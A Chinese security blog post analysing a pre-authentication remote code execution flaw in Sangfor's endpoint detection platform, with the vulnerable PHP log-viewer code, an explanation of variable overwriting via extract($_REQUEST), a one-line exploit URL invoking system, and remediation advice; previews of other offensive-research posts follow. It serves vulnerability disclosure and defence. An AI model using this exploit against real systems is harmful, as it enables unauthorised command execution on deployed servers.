深信服终端检测响应平台 preauth RCE 0day 分析

 

0x00关于本文

这个护网太刺激了,才一天就爆出那么多0day出来。
而深信服这个玩意的0day非常重磅,甚至据说因为这个0day太猛,还要暂停演习,免得太不公平
但是在机缘巧合之下,笔者拿到了相关漏洞的代码,不禁哑然失笑,没想到这个漏洞居然这么低级,一个大厂开发的东西理应不该如此低级才对,但是事实就是这样,笔者也很惊讶

在这篇文章中,笔者会给出相关的漏洞代码,漏洞分析,EXP,修复措施

0x01 漏洞代码

漏洞出现在 tool/log/c.php里面
代码如下
<?php
/**
 * c.php
 * 查看ldb的日志
 * 支持正则表达式过滤,可以过滤文件以及每行日志
 */
 
call_user_func(function() {
    /**
     * 编解码
     * @param string $data 编解码数据
     * @return string 返回编解码数据
     */
    $code = function($data) {
        for ($i = 0; $i < strlen($data); ++$i) {
            $data[$i] = $data[$i] ^ 'G';
        }
        return $data;
    };
    
    /**
     * 加密请求
     * @param string $site  站点
     * @param string $query 请求串
     * @return string 返回请求URL
     */
    $request = function($site, $query) use(&$code) {
        $path = base64_encode($code($query));
        return "$site/$path";
    };
    
    /**
     * 解密回复
     * @param string $data 回复数据
     * @return array 返回回复数据
     */
    $response = function($data) use(&$code) {
        $ret = json_decode($data, true);
        if (is_null($ret)) {
            $dec = $code(base64_decode($data));
            $ret = json_decode($dec, true);
        }
        return $ret;
    };
    
    /**
     * 找到匹配的日志
     * @param string $path 文件路径匹配
     * @param string $item 日志项匹配
     * @param string $topn TOP N 
     * @param string $host 主机
     * @return array 返回匹配结果
     */
    $collect = function($path, $item, $topn, $host) use(&$request, &$response) {
        $path   = urlencode($path);
        $item   = urlencode($item);
        $result = file_get_contents($request("http://127.0.0.1:8089""op=ll&host=$host&path=$path&item=$item&top=$topn"));
        return $response($result);
    };
    
    /**
     * 显示某个表单域
     * @param array $info 表单域信息, array("name" => "xx", "value" => "xxx", "note" => "help");
     * @return
     */
    $show_input = function($info) {
        extract($info);
        $value = htmlentities($value);
        echo "<p><font size=2>$title: </font><input type=\"text\" size=30 id=\"$name\" name=\"$name\" value=\"$value\"><font size=2>$note</font></p>";
    };
    
    /**
     * 去掉反斜杠
     * @param string $var 值
     * @return string 返回去掉反斜杠的值
     */
    $strip_slashes = function($var) {
        if (!get_magic_quotes_gpc()) {
            return $var;
        }
        return stripslashes($var);
    };

    /**
     * 显示表单
     * @param array $params 请求参数
     * @return
     */
    $show_form = function($params) use(&$strip_slashes, &$show_input) {
        extract($params);
        $host  = isset($host)  ? $strip_slashes($host)  : "127.0.0.1";
        $path  = isset($path)  ? $strip_slashes($path)  : "";
        $row   = isset($row)   ? $strip_slashes($row)   : "";
        $limit = isset($limit) ? $strip_slashes($limit) : 1000;
        
        // 绘制表单
        echo "<pre>";
        echo '<form id="studio" name="studio" method="post" action="">';
        $show_input(array("title" => "Host ",  "name" => "host",  "value" => $host,  "note" => " - host, e.g. 127.0.0.1"));
        $show_input(array("title" => "Path ",  "name" => "path",  "value" => $path,  "note" => " - path regex, e.g. mapreduce"));
        $show_input(array("title" => "Row  ",  "name" => "row",   "value" => $row,   "note" => " - row regex, e.g. \s[w|e]\s"));
        $show_input(array("title" => "Limit",  "name" => "limit""value" => $limit, "note" => " - top n, e.g. 100"));
        echo '<input type="submit" id="button">';
        echo '</form>';
        echo "</pre>";
    };
    
    /**
     * 入口函数
     * @param array $argv 配置参数
     * @return
     */
    $main = function($argv) 
        use(&$collect) {
        extract($argv);
        if (!isset($limit)) {
            return;
        }
        $result = $collect($path, $row, $limit, $host);
        if (!is_array($result)) {
            echo $result, "\n";
            return;
        }
        if (!isset($result["success"]) || $result["success"] !== true) {
            echo $result, "\n";
            return;
        }
        foreach ($result["data"] as $host => $items) {
            $last = "";
            foreach ($items as $item) {
                if ($item["name"] != $last) {
                    $last = $item["name"];
                    echo "\n[$host] -> $last\n\n";
                }
                echo $item["item"], "\n";
            }
        }
    };
    
    set_time_limit(0);
    echo '<html><head><meta http-equiv="Content-Type" Content="text/html; Charset=utf-8"></head>';
    echo '<body bgcolor="#e8ddcb">';
    echo "<p><b>Log Helper</b></p>";
    $show_form($_REQUEST);
    echo "<pre>";
    $main($_REQUEST);
    echo "</pre>";  
});
?>

0x02 漏洞分析

首先代码开头的call_user_func里面套一个function就很迷,搞这个在笔者眼里完全是多余的
因为其实就相当于执行function()里面的内容而已

接着我们在77-82行看到了他们定义的strip_slashes
笔者实在无法理解这些人为什么不直接用 function name($xxx){}的形式定义函数,而一定要弄个时髦的匿名函数,然后复制给一个变量,但是既然这么做了,我们就接着看下去

接着呢在89-94行里面,调用了这个函数
看起来就是调用对吧,很完美对吧,没什么问题对吧....只要不被变量覆盖就好
可惜的是,偏偏就是有变量覆盖

刚才代码那里,90行直接extrat($params),那么问题来了,$params从哪儿来的呢?
往下翻翻就能找到答案
啊这,直接从$_REQUEST里面来,这说明用户提交的参数被直接extract可以覆盖任意变量了..包括$strip_slashes

那么该怎么利用呢?
我们知道PHP是支持通过字符串来调用函数的
举个例子
这个会直接调用phpinfo函数
因此按照上面的代码,只需要把strip_slashes覆盖成我们想要执行的函数就可以了,而参数$host也可以覆盖,那么就相当于是可以调用任意函数,传入任意参数了!

0x03 POC/EXP

https://web/tool/log/c.php?strip_slashes=system&host=id
是的只需要这么一行就可以利用
防守方请注意,这是extract的$_REQUEST,因此无论是GET/POST/COOKIE的参数都可以用来覆盖,因此把这句话添加到WAF里面过滤是不可行的,攻击者可以轻易绕过!

0x04 修复方法

不要妄图设置WAF规则来修复!
直接删掉这里的c.php!
鉴于他们代码质量不佳,漏洞也一定不止这一处,建议直接下线,不然依然有被打穿的风险


0x05 最后说两句

现在HW太疯狂了,以前据说是Nday一起上,万箭齐发就可以了,现在是到处丢0day
以前是重金雇佣带黑客,现在是重金购买高危0day
这种贴近实战的攻防演习一下来,谁的东西能真正抗攻击抗0day,谁的是看起来很不错但实际上很粗糙,一下就能被看出来了。
尽管0day爆出来很刺激,蓝方的朋友们又得加班加点熬夜防护了,但这至少比让0day在黑市上面被转手114514次最后被犯罪分子利用来的好

评论

发表评论

此博客中的热门博文

局域网监控软件WFilter ICF 鸡肋0day RCE漏洞挖掘

图片
  0x00关于本文 逛freebuf的时候看到了这篇文章, 关于PDD员工发帖溯源联想到的相关技术与实现 ,其中提到了一个叫做wfilter的局域网监控软件。 这个软件官网提供了下载链接,支持10天实用,于是我就下下来研究一番。 作为一个搞安全的人,我最感兴趣的是这个软件本身是否存在缺陷,毕竟这类用于监控的安全软件自身出现漏洞是最有戏剧性的事情了 0x01不同寻常 Web管理 Wfilter通过串联/旁路的方式进行部署,同时提供一个Web管理接口供管理员进行远程管理。而作为一个Web狗,我自然把重心放在了这个Web管理接口上了。 这个Web管理接口不同寻常的第一点就是登录之后不会返回任何Cookies,而且请求接口的时候也不会带Cookies或者任何特殊的Headers 那它是怎么进行鉴别的呢? 测试了一番之后发现居然是根据IP地址来鉴别的,一旦管理者登录,wfilter就会记录下管理者的IP地址,然后允许其访问这些接口。 这么诡异的鉴别方式大概率搭配了一个诡异的后端实现,结果我用火绒剑一看,发现后台是通过CGI运行的。也就是说想要审计这个软件还得去逆向这个EXE! 算了,逆向就逆向吧,正好试试IDA7.5效果怎么样 0x01对于cgiproj.exe的逆向分析 这个Web接口的特点是通过/fcgi?cmd=【功能名】来调用,因此在IDA里面搜索相关的字符串就可以找到实现通过功能名来执行不同功能的函数了。 这个函数非常的大,以至于我需要修改IDA的hexrays支持的最大函数大小来让IDA能够成功反编译这个函数(Web狗实在是不想啃汇编了)。 经过一番猜测和实验,我发现这个调用sub_BF65E0中的参数包含了功能名字,而v266[1]中存放的则是其对应的函数。通过这些信息我可以查看具体接口是如何实现。 0x02 思路1:找到无需鉴权的功能,直接拿下服务器! 实现这个思路,简单来说就两个步骤,第一个是找到无需鉴权的功能,第二个是逆向分析然后找到有漏洞功能然后利用。 为了找到无需鉴权就能使用的功能,简单起见,我搜集了那个大函数中的所有的字符串,然后拿到接口中去fuzz,接着发现viewHelp,helpSearch,login,mobileCode,mlogin,logout,remoteLogin,viewToolTip,ExecuteNoLogin,forget
阅读全文

别想偷我源码:通用的针对源码泄露利用程序的反制(常见工具集体沦陷)

图片
  0x00 关于本文     是的没错 我又去蹂躏安全工具了,和以前我单个单个地欺负不同,这次发现的攻击手段是通用的,可以通杀大部分源码泄露漏洞利用程序。      本文会包含常见泄露漏洞的原理介绍(Git/Svn),利用工具自身的安全风险分析,简单易懂的POC制作方式,针对常见工具的攻击测试,以及提升反制威力的方法及展望。 0x01Git泄露:漏洞原理介绍      Git是什么大家应该都很清楚(不知道Git是啥的人多半是不肯来光临这个博客的)      有些开发人员直接把代码clone到服务器的web目录来部署,但是开发人员或许不知道的是,clone下来的不只是代码,还有一个.git目录,这个目录被叫做版本库。攻击者可以通过访问这个目录,解析其中的文件,dump整站源码。     想要更深入地理解Git泄露漏洞,了解攻击流程,就需要了解.git目录的结构     tree一下这个目录,发现内容如下      index文件中包含了这个项目中的各个文件的信息,包括文件路径和Git对象的对应的40位哈希值。在这里我们不需要对Git对象理解的很深入,只需要知道里面包含了文件内容,是让攻击者垂涎欲滴的东西就可以了。      想要拿到Git对象,就需要转去objects目录。objects目录存放了所有的git对象,对于一个git对象,40位哈希的前两位会作为目录名,而后面的38位会作为文件名,存在objects下面。举个例子,一个Git对象那个的hash是cb75d8439f004f41d5f85ffa5f8d017df395651a,那么它就会被存在cb/75d8439f004f41d5f85ffa5f8d017df395651a。     知道了这些信息之后,就可以知道Git泄露攻击是如何进行的了,首先攻击者访问index文件,解析后得到文件名和对象哈希。接着按着对象哈希一个一个去objects目录获取到Git对象,解析后得到文件。 0x02 Git泄露利用工具的安全风险     显而易见的,手动解析index文件并去下载然后再去解析Git对象是一项烦人又重复的活,因此有大量的工具被开发出来解放黑客们的双手。这些工具可以将整个攻击流程自动化,自动下载项目的所有文件,并且重建整个项目的目录结构。     但是在这个过程中存在一个严重的安全风险,这些工具在重建项目的
阅读全文

反-反蜜罐:以三个反蜜罐插件的缺陷为例

图片
  0x00 关于本文     当时想保研,想搞篇论文,就捣鼓了个XSS平台并研究了反蜜罐插件的缺陷,缝在一起投某中文期刊,然后这种乱缝合果不其然被拒,之后我就把这事丢在一边了。     最近上t00ls看到某公司某蜜罐,发现其中已经采用了某些绕过反蜜罐插件的措施,一下子勾起了我的回忆。尽管过去了那么久,事后证明保研没有看起来的那么难,而且我也准备退学跑路了,但这些研究依然在那里并且还没过时,因此我决定去掉里面吹水的部分,整理下后发出来。     本文以三个反蜜罐插件为例( anti-honeypot 、 AntiHoneypot-Chrome-simple 、 antiHoneypot ),分析蜜罐插件的工作原理及导致其被反向检测以及绕过的缺陷。尽管本文会对具有反制能力的蜜罐做一定的介绍,但读者需要对XSS、Jsonp劫持有一定的了解才能更好地理解本文。 0x01 会咬人的蜜罐&反蜜罐插件     有网络安全基础的读者应该都知道蜜罐是什么。防御者搞一个外表诱人但监控严密的系统来引诱黑客进攻,将黑客的一举一动记录下来,以对其分析和追踪。据说当年大名鼎鼎的黑客凯文米特尼克就栽在蜜罐上,结果惨遭溯源。     在2013年BlackHat Eu上,有研究者 提出 通过Jsonp/CSRF/XSS的方法攻击黑客的浏览器,以定位黑客的身份。随着护网行动的普及,默安幻阵和长亭谛听这样具有反制能力的蜜罐在各个攻防演练中大放异彩,这些蜜罐内置了大量的Jsonp和XSS接口,一旦访问,运行在浏览器前端的js脚本就通过这些接口拿到大黑客的QQ/CSDN/微博/爱奇艺/优酷 等等的账号名,再通过社工库等办法拿到大黑客的更多信息,让大黑客率先响应国家实名上网的号召。     当然大黑客也不是吃素的,黑客们开发了各式各样的 蜜罐阻拦插件 ,这些插件可以通过检查网页的Dom和请求的URL来判断当前访问的的网站是否是蜜罐,并实时阻断浏览器发出的可疑请求,阻止恶意js脚本拿到敏感信息。 0x02  AntiHoneypot-Chrome-simple  插件原理&缺陷分析 原理分析     AntiHoneypot-Chrome-simple插件通过简单的预置的蜜罐特征来检测蜜罐,它在插件的background.js中定义了一组规则,分别是文件名和内容的对应。     插件通过c
阅读全文